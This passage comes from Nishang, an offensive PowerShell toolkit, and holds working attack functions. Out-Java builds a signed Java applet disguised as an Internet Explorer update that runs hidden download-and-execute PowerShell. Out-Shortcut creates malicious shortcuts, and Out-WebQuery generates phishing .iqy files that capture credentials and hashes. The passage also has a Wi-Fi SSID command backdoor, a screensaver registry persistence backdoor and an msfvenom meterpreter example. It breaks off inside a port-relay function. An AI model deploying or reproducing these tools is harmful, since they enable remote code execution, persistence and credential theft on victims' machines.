5320PS > Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath "C:\Program Files\Java\jdk1.7.0_25"
5321
5322Use above command to pass an argument to the powershell script/module.
5323
5324.EXAMPLE
5325PS > Out-Java -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -JDKPath "C:\Program Files\Java\jdk1.7.0_25" -NoSelfSign
5326
5327Due to the use of -NoSelfSign in above command, no self signed certificate would be used to sign th JAR.
5328
5329.LINK
5330http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
5331https://github.com/samratashok/nishang
5332#>
5333
5334
5335
5336 [CmdletBinding()] Param(
5337
5338 [Parameter(Position = 0, Mandatory = $False)]
5339 [String]
5340 $Payload,
5341
5342 [Parameter(Position = 1, Mandatory = $False)]
5343 [String]
5344 $PayloadURL,
5345
5346
5347 [Parameter(Position = 2, Mandatory = $False)]
5348 [String]
5349 $Arguments,
5350
5351 [Parameter(Position = 3, Mandatory = $True)]
5352 [String]
5353 $JDKPath,
5354
5355 [Parameter(Position = 4, Mandatory = $False)]
5356 [String]
5357 $OutputPath="$pwd",
5358
5359 [switch]
5360 $NoSelfSign
5361
5362
5363 )
5364
5365
5366 if(!$Payload)
5367 {
5368 $Payload = "IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
5369 }
5370
5371#Java code taken from the Social Enginnering Toolkit (SET) by David Kennedy
5372 $JavaClass = @"
5373import java.applet.*;
5374import java.awt.*;
5375import java.io.*;
5376public class JavaPS extends Applet {
5377public void init() {
5378Process f;
5379//http://stackoverflow.com/questions/4748673/how-can-i-check-the-bitness-of-my-os-using-java-j2se-not-os-arch/5940770#5940770
5380String arch = System.getenv("PROCESSOR_ARCHITECTURE");
5381String wow64Arch = System.getenv("PROCESSOR_ARCHITEW6432");
5382String realArch = arch.endsWith("64") || wow64Arch != null && wow64Arch.endsWith("64") ? "64" : "32";
5383String cmd = "powershell.exe -WindowStyle Hidden -nologo -noprofile $Payload";
5384//Remove the below if condition to use 64 bit powershell on 64 bit machines.
5385if (realArch == "64")
5386{
5387 cmd = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden -nologo -noprofile $Payload";
5388}
5389try {
5390f = Runtime.getRuntime().exec(cmd);
5391}
5392catch(IOException e) {
5393e.printStackTrace();
5394}
5395Process s;
5396}
5397}
5398"@
5399
5400
5401 #Compile the Java file
5402 $JavaFile = "$OutputPath\JavaPS.java"
5403 Out-File -InputObject $JavaClass -Encoding ascii -FilePath $JavaFile
5404 $JavacPath = "$JDKPath" + "\bin\javac.exe"
5405 & "$JavacPath" "$JavaFile"
5406
5407 #Create a manifest for JAR, taken from SET
5408 $Manifest = @"
5409Permissions: all-permissions
5410Codebase: *
5411Application-Name: Microsoft Internet Explorer Update (SECURE)
5412"@
5413 $ManifestFile = "$OutputPath\manifest.txt"
5414 Out-File -InputObject $Manifest -Encoding ascii -FilePath $ManifestFile
5415
5416 #Create the JAR
5417 $Jarpath = "$JDKPath" + "\bin\jar.exe"
5418 & "$JarPath" "-cvfm" "$OutputPath\JavaPS.jar" "$ManifestFile" "JavaPS.class"
5419
5420 #Parameters passed to keytool and jarsigner. You may change these to your choice.
5421 $KeystoreAlias = "SignApplet"
5422 $KeyStore = "PSKeystore"
5423 $StorePass = "PSKeystorePass"
5424 $KeyPass = "PSKeyPass"
5425 $DName = "cn=Windows Update, ou=Microsoft Inc, o=Microsoft Inc, c=US"
5426
5427 if ($NoSelfSign -eq $False)
5428 {
5429 #Generate a keypair for self-signing
5430 #http://rvnsec.wordpress.com/2014/09/01/ps1encode-powershell-for-days/
5431 $KeytoolPath = "$JDKPath" + "\bin\keytool.exe"
5432 & "$KeytoolPath" "-genkeypair" "-alias" "$KeystoreAlias" "-keystore" "$KeyStore" "-keypass" "$KeyPass" "-storepass" "$StorePass" "-dname" "$DName"
5433
5434 #Self sign the JAR
5435 $JarSignerPath = "$JDKPath" + "\bin\jarsigner.exe"
5436 & "$JarSignerPath" "-keystore" "$KeyStore" "-storepass" "$StorePass" "-keypass" "$KeyPass" "-signedjar" "$OutputPath\SignedJavaPS.jar" "$OutputPath\JavaPS.jar" "SignApplet"
5437
5438 #Output simple html. This could be used with any cloned web page.
5439 #Host this HTML and SignedJarPS.jar on a web server.
5440 $HTMLCode = @'
5441 <div>
5442 <object type="text/html" data="http://windows.microsoft.com/en-IN/internet-explorer/install-java" width="100%" height="100%">
5443 </object></div>
5444 <applet code="JavaPS" width="1" height="1" archive="SignedJavaPS.jar" > </applet>'
5445'@
5446 $HTMLFile = "$OutputPath\applet.html"
5447 Out-File -InputObject $HTMLCode -Encoding ascii -FilePath $HTMLFile
5448
5449 #Cleanup
5450 Remove-Item "$OutputPath\PSKeyStore"
5451 Remove-Item "$OutputPath\JavaPS*"
5452 }
5453 elseif ($NoSelfSign -eq $True)
5454 {
5455 Write-Warning "You chose not to self sign. Use your valid certificate to sign the JavaPS.jar manually."
5456 #Cleanup
5457 Remove-Item "$OutputPath\JavaPS.java"
5458 Remove-Item "$OutputPath\JavaPS.class"
5459 }
5460 #Cleanup to remove temporary files
5461 Remove-Item "$OutputPath\manifest.txt"
5462}
5463
5464
5465#######################################Out-Shortcut#############################################
5466
5467function Out-Shortcut
5468{
5469<#
5470.SYNOPSIS
5471Nishang script which creates a shortcut capable of launching PowerShell commands and scripts.
5472
5473.DESCRIPTION
5474The script generates a shortcut (.lnk). When a target opens the shortcut, the predefined powershell scripts and/or commands get executed.
5475A hotkey for the shortcut could also be generated. Also, the icon of the shortcut could be set too.
5476
5477.PARAMETER Payload
5478Payload which you want execute on the target.
5479
5480.PARAMETER PayloadURL
5481URL of the powershell script which would be executed on the target.
5482
5483.PARAMETER Arguments
5484Arguments to the powershell script to be executed on the target.
5485
5486.PARAMETER OutputPath
5487Path to the .lnk file to be generated. Default is with the name Shortcut to File Server.lnk in the current directory.
5488
5489.PARAMETER Hotkey
5490The Hotkey to be assigned to the shortcut. Default is F5.
5491
5492.PARAMETER Icon
5493The Icon to be assigned to the generated shortcut. Default is that of explorer.exe
5494
5495.EXAMPLE
5496PS > Out-Shortcut -Payload "-WindowStyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"
5497
5498Above command would execute Get-ChildItem on the target machine when the shortcut is opened. Note that powershell.exe is
5499not a part of the payload as the shortcut already points to it.
5500
5501.EXAMPLE
5502PS > Out-Shortcut -PayloadURL http://192.168.254.1/Get-Wlan-Keys.ps1
5503
5504Use above command to generate a Shortcut which download and execute the given powershell script in memory on target.
5505
5506.EXAMPLE
5507PS > Out-Shortcut -Payload "-EncodedCommand <>"
5508
5509Use above command to generate a Shortcut which executes the given encoded command/script.
5510Use Invoke-Encode from Nishang to encode the command or script.
5511
5512
5513.EXAMPLE
5514PS > Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM
5515
5516Use above command to pass an argument to the powershell script/module.
5517
5518.EXAMPLE
5519PS > Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3'
5520
5521Use above command to assign F3 as hotkey to the shortcut
5522
5523.EXAMPLE
5524PS > Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter.psm1 -Arguments Check-VM -HotKey 'F3' -Icon 'notepad.exe'
5525
5526Use above command to assign notepad icon to the generated shortcut.
5527
5528.LINK
5529http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html
5530https://github.com/samratashok/nishang
5531http://blog.trendmicro.com/trendlabs-security-intelligence/black-magic-windows-powershell-used-again-in-new-attack/
5532#>
5533 [CmdletBinding()] Param(
5534 [Parameter(Position = 0, Mandatory = $False)]
5535 [String]
5536 $Payload,
5537
5538 [Parameter(Position = 1, Mandatory = $False)]
5539 [String]
5540 $PayloadURL,
5541
5542
5543 [Parameter(Position = 2, Mandatory = $False)]
5544 [String]
5545 $Arguments,
5546
5547 [Parameter(Position = 3, Mandatory = $False)]
5548 [String]
5549 $OutputPath = "$pwd\Shortcut to File Server.lnk",
5550
5551 [Parameter(Position = 4, Mandatory = $False)]
5552 [String]
5553 $HotKey = 'F5',
5554
5555
5556 [Parameter(Position = 5, Mandatory = $False)]
5557 [String]
5558 $Icon='explorer.exe'
5559
5560
5561
5562
5563 )
5564 if(!$Payload)
5565 {
5566 $Payload = " -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments"
5567 }
5568 $WshShell = New-Object -comObject WScript.Shell
5569 $Shortcut = $WshShell.CreateShortcut($OutputPath)
5570 $Shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
5571 $Shortcut.Description = "Shortcut to Windows Update Commandline"
5572 $Shortcut.WindowStyle = 7
5573 $Shortcut.Hotkey = $HotKey
5574 $Shortcut.IconLocation = "$Icon,0"
5575 $Shortcut.Arguments = $Payload
5576 $Shortcut.Save()
5577 Write-Output "The Shortcut file has been written as $OutputPath"
5578
5579}
5580
5581
5582######################################Out-WebQury#############################################
5583function Out-WebQuery
5584{
5585<#
5586.SYNOPSIS
5587Nishang script which creates a Web Query (.iqy) file which can be used for phishing attacks.
5588
5589.DESCRIPTION
5590The script generates a Web Query (.iqy). When a target opens the file, it is opened inside an Excel Sheet and the
5591user is presented with a warning for enabling data connection. If the user allows it, he is presented with a prompt
5592which asks for credentials. As soon as the user enters the credentials, it is sent to the remote server specified
5593while generating the file.
5594
5595The attacker must run a web server which is able to log the requests made to it by the targets. While any regular web
5596server can be used, Start-CaptureServer.ps1 in the Utility directory of Nishang could be used as well. Start-CaptureServer
5597supports Basic auth for capturing credentials in plain and NTLM authentication for capturing hashes.
5598
5599.PARAMETER URL
5600URL to which the connection from the target is made. A web server which logs requests must run at this URL.
5601
5602.PARAMETER Message
5603Message which will be shown to the user after he enables the Data Connection.
5604
5605.PARAMETER OutputPath
5606Path to the .iqy file to be generated. Default is with the name QueryData.iqy in the current directory.
5607
5608.EXAMPLE
5609PS > Out-WebQuery -URL http://192.168.1.2/
5610
5611Use above command to generate a Web Query file. When a user opens it and enables data connection,
5612a credentials prompt will be shown to him. The credentials entered could be captured on the listener machine
5613using Start-CaptureServer script from Nishang.
5614
5615To capture credentials in plain, run below command on the attacker's machine:
5616Start-CaptureServer -AuthType Basic -IPAddress 192.168.230.1 -LogFilePath C:\test\log.txt
5617
5618To capture hashes
5619Start-CaptureServer -AuthType NTLM2 -IPAddress 192.168.230.1 -LogFilePath C:\test\log.txt
5620
5621PS > Out-WebQuery -URL \\192.168.1.2\C$
5622
5623Use above command to generate a Web Query file. When a user opens it, his SMB hash would be captured
5624on the attacker's machine where Start-CaptureServer is running.
5625
5626
5627.LINK
5628http://www.labofapenetrationtester.com/2015/08/abusing-web-query-iqy-files.html
5629https://github.com/samratashok/nishang
5630https://twitter.com/subTee/status/631509345918783489
5631https://support.microsoft.com/en-us/kb/157482
5632#>
5633 [CmdletBinding()] Param(
5634 [Parameter(Position = 0, Mandatory = $True)]
5635 [String]
5636 $URL,
5637
5638 [Parameter(Position = 1, Mandatory = $False)]
5639 [String]
5640 $OutputPath = "$pwd\QueryData.iqy"
5641
5642 )
5643 $iqycontent = @"
5644WEB
56451
5646$URL
5647"@
5648
5649 Out-File -FilePath $OutputPath -InputObject $iqycontent -Encoding ascii
5650 Write-Output "The Web Query file has been written as $OutputPath"
5651
5652}
5653
5654##################################End of Client Side Attack functions###############################
5655
5656##################################### Gupt Backdoor #################################################
5657function Gupt-Backdoor
5658{
5659<#
5660.SYNOPSIS
5661Gupt is a backdoor in Nishang which could execute commands and scripts from specially crafted Wireless Network Names.
5662
5663.DESCRIPTION
5664Gupt looks for a specially crafted Wireless Network Name/SSID from list of all avaliable networks. It matches first four characters of
5665each SSID with the parameter MagicString. On a match, if the 5th character is a 'c', rest of the SSID name is considered to be a command and
5666exeucted. If the 5th character is a 'u', rest of the SSID is considered the id part of Google URL Shortener and a script is downloaded and
5667executed in memory from the URL. See examples for usage.
5668
5669Gupt does not connect to any Wireless network and this makes it more stealthy and helps in bypassing network traffic monitoring.
5670
5671.PARAMETER MagicString
5672The string which Gupt would compare with the available SSIDs.
5673
5674.PARAMETER Arguments
5675Arguments to pass to a downloaded script.
5676
5677.EXAMPLE
5678PS > Gupt-Backdoor -MagicString op3n -Verbose
5679In above, Gupt will look for an SSID starting with "op3n". To execute whoami on the target, the wireless network name should be "op3ncwhoami".
5680
5681PS > Gupt-Backdoor -MagicString op3n -Verbose
5682In above, Gupt will look for an SSID starting with "op3n". To execute a powershell script on the target, the wireless network name should be
5683"op3nunJEuug". Here, Gupt will use of characters after the 5th one and make the URL http://goo.gl/nJEuug. A script hosted at the URL resolved
5684by the Google shortener would be downloaded and executed.
5685
5686.LINK
5687http://www.labofapenetrationtester.com/2014/08/Introducing-Gupt.html
5688https://github.com/samratashok/nishang
5689#>
5690 [CmdletBinding()] Param(
5691
5692 [Parameter(Position=0, Mandatory = $True)]
5693 [String]
5694 $MagicString,
5695
5696 [Parameter(Position=3, Mandatory = $False)]
5697 [String]
5698 $Arguments
5699
5700 )
5701 #Get list of available Wlan networks
5702 while($True)
5703 {
5704 Write-Verbose "Checking wireless networks for instructions."
5705 $networks = Invoke-Expression "netsh wlan show network"
5706 $ssid = $networks | Select-String "SSID"
5707 $NetworkNames = $ssid -replace ".*:" -replace " "
5708 ForEach ($network in $NetworkNames)
5709 {
5710 #Check if the first four characters of our SSID matches the given MagicString
5711 if ($network.Substring(0,4) -match $MagicString.Substring(0,4))
5712 {
5713 Write-Verbose "Found a network with instructions!"
5714 #If the netowrk SSID contains fifth chracter "u", it means rest of the SSID is a URL
5715 if ($network.Substring(4)[0] -eq "u")
5716 {
5717 Write-Verbose "Downloading the attack script and executing it in memory."
5718 $PayloadURL = "http://goo.gl/" + $network.Substring(5)
5719 $webclient = New-Object System.Net.WebClient
5720 Invoke-Expression $webclient.DownloadString($PayloadURL)
5721 if ($Arguments)
5722 {
5723 Invoke-Expression $Arguments
5724 }
5725 Start-Sleep -Seconds 10
5726 }
5727 elseif ($network.Substring(4)[0] -eq "c")
5728 {
5729 $cmd = $network.Substring(5)
5730 if ($cmd -eq "exit")
5731 {
5732 break
5733 }
5734 Write-Verbose "Command `"$cmd`" found. Executing it."
5735 Invoke-Expression $cmd
5736 Start-Sleep -Seconds 10
5737 }
5738 }
5739 }
5740 Start-Sleep -Seconds 5
5741 }
5742}
5743
5744###################################Function for generating encoded DNS TXT Records###########################
5745function Out-DnsTxt
5746{
5747<#
5748.SYNOPSIS
5749Script for Nishang to generate DNS TXT records which could be used with other scripts.
5750
5751.DESCRIPTION
5752Use this script to generate DNS TXT records to be used with DNS_TXT_Pwnage and Execute-DNSTXT-Code.
5753The script asks for a path to a plain file or string, compresses and encodes it and writes to a file "encodedtxt.txt" in the current working directory.
5754Each line in the generated file is a DNS TXT record to be saved in separate subbdomain.
5755The length of DNS TXT records is assumed to be 255 characters by the script.
5756
5757.PARAMETER DataToEncode
5758The path of the file to be decoded. Use with -IsString to enter a string.
5759
5760.PARAMETER OutputFilePath
5761The path of the output file. Default is "encodedtxt.txt" in the current working directory.
5762
5763.PARAMETER $LengthOfTXT
5764The length of the TXT records. Default is 255.
5765
5766.PARAMETER IsString
5767Use this to specify the command to be encoded if you are passing a string in place of a filepath.
5768
5769.EXAMPLE
5770PS > OUT-DNSTXT -DataToEncode C:\nishang\Gather\Get-Information.ps1
5771Use above command to generate encoded DNS TXT records. Each record must be put in a separate subdomain.
5772
5773.EXAMPLE
5774PS > OUT-DNSTXT "Get-Service" -IsString
5775Use above to generate TXT records for a command.
5776
5777
5778.EXAMPLE
5779PS > OUT-DNSTXT -DataToEncode C:\shellcode\shellcode.txt
5780Use above command to generate encoded DNS TXT records for a shellcode. Each record must be put in a separate subdomain.
5781
5782.LINK
5783http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html
5784https://github.com/samratashok/nishang
5785
5786#>
5787 [CmdletBinding()] Param(
5788 [Parameter(Position = 0, Mandatory = $True)]
5789 [String]
5790 $DataToEncode,
5791
5792 [Parameter(Position = 1, Mandatory = $False)]
5793 [String]
5794 $OutputFilePath = "$pwd\encodedtxt.txt",
5795
5796 [Parameter(Mandatory = $False)]
5797 [String]
5798 $LengthOfTXT = 255,
5799
5800 [Switch]
5801 $IsString
5802 )
5803 if($IsString -eq $true)
5804 {
5805
5806 $Enc = $DataToEncode
5807
5808 }
5809 else
5810 {
5811 $Enc = Get-Content $DataToEncode -Encoding Ascii
5812 }
5813
5814 #Compression logic from http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
5815 $ms = New-Object IO.MemoryStream
5816 $action = [IO.Compression.CompressionMode]::Compress
5817 $cs = New-Object IO.Compression.DeflateStream ($ms,$action)
5818 $sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
5819 $Enc | ForEach-Object {$sw.WriteLine($_)}
5820 $sw.Close()
5821 # Base64 encode stream
5822 $Compressed = [Convert]::ToBase64String($ms.ToArray())
5823 $index = [math]::floor($Compressed.Length/$LengthOfTXT)
5824 $i = 0
5825 Out-File -InputObject $null -FilePath $OutputFilePath
5826 #Split encoded input in strings of 255 characters if its length is more than 255.
5827 if ($Compressed.Length -gt $LengthOfTXT)
5828 {
5829 while ($i -lt $index )
5830 {
5831 $TXTRecord = $Compressed.Substring($i*$LengthOfTXT,$LengthOfTXT)
5832 $i +=1
5833 Out-File -InputObject $TXTRecord -FilePath $OutputFilePath -Append
5834 Out-File -InputObject "`n`n`n" -FilePath $OutputFilePath -Append
5835 }
5836 $remainingindex = $Compressed.Length%$LengthOfTXT
5837 if ($remainingindex -ne 0)
5838 {
5839 $TXTRecord = $Compressed.Substring($index*$LengthOfTXT, $remainingindex)
5840 $TotalRecords = $index + 1
5841 }
5842 #Write to file
5843 Out-File -InputObject $TXTRecord -FilePath $OutputFilePath -Append
5844 Write-Output "You need to create $TotalRecords TXT records."
5845 Write-Output "All TXT Records written to $OutputFilePath"
5846 }
5847 #If the input has small length, it could be used in a single subdomain.
5848 else
5849 {
5850 Write-Output "TXT Record could fit in single subdomain."
5851 Write-Output $Compressed
5852 Out-File -InputObject $Compressed -FilePath $OutputFilePath -Append
5853 Write-Output "TXT Records written to $OutputFilePath"
5854 }
5855
5856
5857}
5858
5859##########################################Function for adding screensaver backdoor###########################################
5860function Add-ScrnSaveBackdoor
5861{
5862<#
5863.SYNOPSIS
5864Nishang Script which could set Debugger registry keys for a screensaver to remotely execute commands and scripts.
5865
5866.DESCRIPTION
5867The script reads the value of Windows registry key HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
5868to check for the existing Screensaver. If none exists, one from the default ones which exist in C:\Windows\System32 is used.
5869A Debugger to the screensaver is created at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\.
5870It is the value of the "Debugger" to this key where it writes the payload. A screensaver selected from the default ones is added to this payload.
5871
5872When the payload is executed, the screensaver also runs after it to make it appear legit. Change the contents of the payload URL
5873to execute different scripts using the same backdoor.
5874
5875.PARAMETER Payload
5876Payload which you want execute on the target.
5877
5878.PARAMETER PayloadURL
5879URL of the powershell script which would be executed on the target.
5880
5881.PARAMETER Arguments
5882Arguments to the powershell script to be executed on the target.
5883
5884.PARAMETER NewScreenSaver
5885Full path to the screensaver to be used if none is being used. Default is C:\Windows\System32\Ribbons.scr
5886
5887.EXAMPLE
5888PS > Add-ScrnSaveBackdoor -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process"
5889
5890Use above command to provide your own payload to be executed.
5891
5892
5893.EXAMPLE
5894PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/FireBuster.ps1 -Arguments "FireBuster 192.168.254.1 8440-8445"
5895
5896Use above to execute FireBuster from Nishang for Egress Testing.
5897
5898.EXAMPLE
5899PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor "http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis
5900
5901Use above to execute HTTP-Backdoor from Powerpreter
5902
5903.EXAMPLE
5904PS > Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/code_exec.ps1
5905
5906Use above to execute an in-memory meterpreter in PowerShell format generated using msfvenom
5907(./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell)
5908
5909
5910.LINK
5911http://www.labofapenetrationtester.com/2015/02/using-windows-screensaver-as-backdoor.html
5912https://github.com/samratashok/nishang
5913#>
5914
5915 [CmdletBinding()] Param(
5916 [Parameter(Position = 0, Mandatory = $False)]
5917 [String]
5918 $Payload,
5919
5920 [Parameter(Position = 1, Mandatory = $False)]
5921 [String]
5922 $PayloadURL,
5923
5924 [Parameter(Position = 2, Mandatory = $False)]
5925 [String]
5926 $Arguments,
5927
5928 [Parameter(Position = 3, Mandatory = $False)]
5929 [String]
5930 $NewScreenSaver = "C:\Windows\System32\Ribbons.scr"
5931 )
5932
5933 #Check if ScreenSaver is enabled
5934 #If no enable it, if yes, get its value
5935 if ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("SCRNSAVE.EXE") -eq $null)
5936 {
5937 New-ItemProperty "HKCU:\Control Panel\Desktop\" -Name SCRNSAVE.EXE -Value $NewScreenSaver -PropertyType String
5938 $ScreenSaverName = ($NewScreenSaver -split '\\')[-1]
5939 }
5940 else
5941 {
5942 $ScreenSaverName = ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("SCRNSAVE.EXE") -split '\\')[-1]
5943 }
5944
5945 #Set ScreenSaveTimeOut which is necessary to enable screensaver.
5946 if ((Get-Item "HKCU:\Control Panel\Desktop\").GetValue("ScreenSaveTimeOut") -eq $null)
5947 {
5948 New-ItemProperty "HKCU:\Control Panel\Desktop\" -Name ScreenSaveTimeOut -Value 60 -PropertyType String
5949 }
5950 else
5951 {
5952 Set-ItemProperty "HKCU:\Control Panel\Desktop\" -Name ScreenSaveTimeOut -Value 60
5953 }
5954
5955 #Get a list of default screensavers and select one at random
5956 $ListScrn = Get-ChildItem C:\Windows\System32\*.scr | Where-Object {$_.Name -ne $ScreenSaverName}
5957 $PathToScreensaver = Get-Random $ListScrn
5958
5959 #Add a default screensaver to payload so that it runs after our payload.
5960 if(!$Payload)
5961 {
5962 $RegValue = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('$PayloadURL'));$Arguments" + ";" + $PathToScreensaver + " /s"
5963 }
5964 elseif ($Payload)
5965 {
5966 $RegValue = $Payload + ";" + $Arguments + ";" + $PathToScreensaver + " /s"
5967 }
5968 #Set Debugger for the ScreenSaver executable
5969 if (Test-Path -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName")
5970 {
5971
5972 Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
5973 Write-Output "Payload added as Debugger for $ScreenSaverName"
5974 }
5975 else
5976 {
5977 New-Item "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName"
5978 Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$ScreenSaverName" -Name Debugger -Value $RegValue
5979 Write-Output "Payload added as Debugger for $ScreenSaverName"
5980 }
5981}
5982
5983
5984############################################# Add network relays##########################################
5985function Invoke-NetworkRelay
5986{
5987<#
5988.SYNOPSIS
5989Nishang script which can be used to run netsh port forwarding/relaying commands on remote computers.
5990
5991.DESCRIPTION
5992This script is a wrapper around the netsh Windows command's portproxy functionality. It could be used to create and remove
5993network relays between computers. The script is useful in scenarios when you want to access a port or service running on a
5994target computer which is accessible only through another computer(s) between you and the target computer. Another interesting
5995usecase is when you want to expose a local service to the network.
5996
5997.PARAMETER Relay
5998Specify the type of relay from "v4tov4","v6tov4","v4tov6" and "v6tov6". Default is v4tov4.
5999v4tov4 - Listen on v4 and connect to v4.
6000
6001
6002.PARAMETER ListenAddress
6003The local/listener IP address to which a remote port will be forwarded. Default is 0.0.0.0 (IPv4)
6004
6005.PARAMETER ListenPort
6006The local/listener port to which a remote port will be forwarded. Default is 8888.
6007
6008.PARAMETER ConnectAddress
6009The target/destination IP address whose port will be forwarded/mapped to a local port.
6010
6011.PARAMETER ConnectPort
6012The target/destination port which will be forwarded/mapped to a local port.
6013
6014.PARAMETER ComputerName
6015The name or IP address of the computer where the netsh command would be executed.
6016
6017.PARAMETER UserName
6018Username for the computer specified with the ComputerName parameter.
6019
6020.PARAMETER Password
6021Password for the computer specified with the ComputerName parameter.
6022
6023.PARAMETER Delete
6024Use the Delete switch to delete a network relay specified by above options.
6025
6026.PARAMETER Show
6027Use the Show switch to show all relays on a computer.
6028
6029.EXAMPLE
6030PS > Invoke-NetworkRelay -Relay v4tov4 -ListenAddress 192.168.254.141 -Listenport 8888 -ConnectAddress 192.168.1.22 -ConnectPort 445 -ComputerName 192.168.254.141
6031Add a network relay which listens on IPv4 and connects to IPv4 and forwards port 445 from 192.168.1.22 to port 8888 of 192.168.254.141.
6032
6033.EXAMPLE
6034PS > Invoke-NetworkRelay -Relay v6tov4 -ListenAddress :: -Listenport 8888 -ConnectAddress 192.168.1.22 -ConnectPort 445 -ComputerName 192.168.254.141
6035Add a network relay which listens on IPv6 and connects to IPv4 and forwards port 445 from 192.168.1.22 to port 8888 of 192.168.254.141.
6036
6037.EXAMPLE
6038PS > Invoke-NetworkRelay -Relay v6tov4 -ListenAddress :: -Listenport 8888 -ConnectAddress fe80::19ed:c169:128c:b68d -ConnectPort 445 -ComputerName domainpc -Username bharat\domainuser -Password Password1234
6039Add a network relay which listens on IPv6 and connects to IPv6 and forwards port 445 from fe80::19ed:c169:128c:b68d to port 8888 of domainpc
6040
6041.EXAMPLE
6042PS > Invoke-NetworkRelay -Relay v4tov4 -ListenAddress 192.168.254.141 -Listenport 8888 -ConnectAddress 192.168.1.22 -ConnectPort 445 -ComputerName 192.168.254.141 -Delete
6043Delete the network relay specified by the ListenAddress and Listen Port.
6044
6045.EXAMPLE
6046PS > Invoke-NetworkRelay -ComputerName domainpc -Username bharat\domainuser -Password Password1234 -Show
6047Show all network relays on the domainpc computer
6048
6049
6050.LINK
6051http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html
6052https://github.com/samratashok/nishang
6053#>
6054
6055 [CmdletBinding(DefaultParameterSetName="AddOrDelete")] Param(
6056
6057 [Parameter(Position = 0, Mandatory = $False, ParameterSetName="AddOrDelete")]
6058 [ValidateSet("v4tov4","v6tov4","v4tov6","v6tov6")]
6059 [String]
6060 $Relay="v4tov4",
6061
6062 [Parameter(Position = 1, Mandatory = $False, ParameterSetName="AddOrDelete")]
6063 [String]
6064 $ListenAddress = "0.0.0.0",
6065
6066 [Parameter(Position = 2, Mandatory= $False, ParameterSetName="AddOrDelete")]
6067 [String]
6068 $ListenPort = 8888,
6069
6070 [Parameter(Position = 3, Mandatory = $True, ParameterSetName="AddOrDelete")]
6071 [String]
6072 $ConnectAddress,
6073
6074 [Parameter(Position = 4, Mandatory = $True, ParameterSetName="AddOrDelete")]
6075 [String]
6076 $ConnectPort,
6077
6078 [Parameter(Position = 5, Mandatory = $False, ParameterSetName="AddOrDelete")]
6079 [Parameter(Position = 0, Mandatory = $False, ParameterSetName="Show")]
6080 [String]
6081 $ComputerName,
6082
6083 [Parameter(Position = 6, Mandatory = $False, ParameterSetName="AddOrDelete")]
6084 [Parameter(Position = 1, Mandatory = $False, ParameterSetName="Show")]
6085 $UserName,
6086
6087 [Parameter(Position = 7, Mandatory = $False, ParameterSetName="AddOrDelete")]
6088 [Parameter(Position = 2, Mandatory = $False, ParameterSetName="Show")]
6089 $Password,
6090
6091 [Parameter(Mandatory = $False, ParameterSetName="AddOrDelete")]
6092 [Switch]
6093 $Delete,
6094
6095 [Parameter(Mandatory = $False, ParameterSetName="Show")]
6096 [Switch]
6097 $Show
6098
6099 )
6100
6101
6102 #Check if Username and Password are provided
6103 if ($UserName -and $Password)
6104 {
6105 $SecurePassword = ConvertTo-SecureString $Password -AsPlainText -Force
6106 $Creds = New-Object System.Management.Automation.PSCredential ($UserName, $SecurePassword)
6107 }
6108 else
6109 {
6110 $Creds = $False
6111 }
6112
6113 if ($Show)
6114 {
6115 if ($Creds)
6116 {
6117 Invoke-Command -ScriptBlock {netsh interface portproxy show all} -ComputerName $ComputerName -Credential $Creds
6118 }
6119 else
6120 {
6121 Invoke-Command -ScriptBlock {netsh interface portproxy show all} -ComputerName $ComputerName
6122 }
6123 }
6124
6125 if (!$Delete -and !$Show)
6126 {
6127 #Prepare relay commands
6128 $V4tov4Relay = "netsh interface portproxy add v4tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress protocol=tcp"
6129 $V6toV4Relay = "netsh interface portproxy add v6tov4 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress"
6130 $V4tov6Relay = "netsh interface portproxy add v4tov6 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress"
6131 $V6toV6Relay = "netsh interface portproxy add v6tov6 listenport=$ListenPort listenaddress=$ListenAddress connectport=$ConnectPort connectaddress=$ConnectAddress protocol=tcp"
6132
